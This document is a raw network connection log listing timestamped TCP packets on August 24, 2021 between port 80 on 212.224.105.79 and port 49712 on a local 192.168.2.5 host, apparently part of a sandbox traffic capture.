Aug 24, 2021 08:49:20.030596972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030627012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030647993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030651093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030652046 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030668020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030684948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030704975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030714989 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030719995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030723095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030738115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030754089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030772924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030788898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030802965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030805111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030807018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030822992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030842066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030859947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030865908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030870914 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030875921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030891895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030908108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030922890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030925035 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030930042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.030939102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030955076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030973911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.030991077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031003952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031006098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031007051 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031022072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031038046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031054020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031070948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031071901 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031076908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031086922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031106949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031131029 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031135082 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031147957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031166077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031182051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031198978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031210899 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031214952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031214952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031234980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031253099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031267881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031277895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031281948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031285048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031301022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031317949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031333923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031348944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031367064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031368971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031371117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031387091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031402111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031416893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031433105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031440020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031443119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031450033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031466007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031481028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031500101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031517029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031532049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031538963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031544924 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031548023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031564951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031580925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031598091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031600952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031604052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031614065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031631947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031650066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031665087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031681061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031691074 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031693935 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031697035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031713009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031728029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031744003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031764030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031774044 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031778097 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031780958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031796932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031812906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031827927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031833887 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031837940 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031843901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031861067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031877041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031896114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031902075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031904936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031913042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031929016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031945944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031961918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031976938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031991959 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.031992912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.031997919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032008886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032028913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032046080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032062054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032068014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032072067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032078028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032093048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032109022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032124996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032138109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032140017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032141924 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032159090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032176018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032191038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032202005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032205105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032207966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032223940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032238960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032254934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032269955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032272100 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032274008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032290936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032309055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032325029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032334089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032339096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032341003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032356977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032371998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032387972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032402992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032422066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032423973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032428980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032439947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032454967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032469988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032486916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032502890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032519102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032529116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032533884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032533884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032553911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032571077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032586098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032593012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032596111 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032602072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032617092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032633066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032648087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032663107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032681942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032684088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032687902 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032699108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032715082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032731056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032746077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032762051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032763004 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032766104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032777071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032793045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032810926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.032824993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032826900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.032826900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.033700943 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.045829058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.045933962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.045950890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.045972109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.045993090 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.046009064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.046715975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.046777010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.046873093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.046890020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.046905041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.046924114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.046966076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.046973944 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.047756910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.047924995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.047943115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.047959089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.047975063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.047993898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.048006058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.048011065 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.048021078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.048022985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.048039913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.048053026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.048064947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.048077106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.048089027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.048100948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.048113108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.048161983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.048173904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.055689096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.055731058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.055763960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.055794954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.055819988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.055824041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.055855036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.055860996 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.055864096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.055886030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.055917025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.055952072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.055984974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.055986881 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.055990934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056019068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056049109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056077003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056088924 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056091070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056098938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056119919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056135893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056152105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056159019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056163073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056168079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056184053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056201935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056216955 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056219101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056220055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056240082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056257010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056272984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056288004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056297064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056299925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056304932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056320906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056339979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056355953 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056356907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056360006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056374073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056390047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056406021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056421041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056427002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056430101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056493044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056515932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056540012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056555033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056557894 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056562901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056583881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056606054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056627035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056641102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056643009 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056648970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056669950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056689978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056718111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056726933 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056730986 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056739092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056760073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056780100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056802034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056818008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056821108 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056822062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056843042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056915998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056941986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056957006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056961060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.056963921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.056984901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057005882 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057027102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057040930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057044029 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057046890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057068110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057089090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057113886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057123899 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057127953 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057137012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057218075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057239056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057260036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057279110 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057280064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057281971 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057300091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057321072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057348013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057356119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057358027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.057370901 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057390928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.057411909 CEST	80	49712	212.224.105.79	192.168.2.5
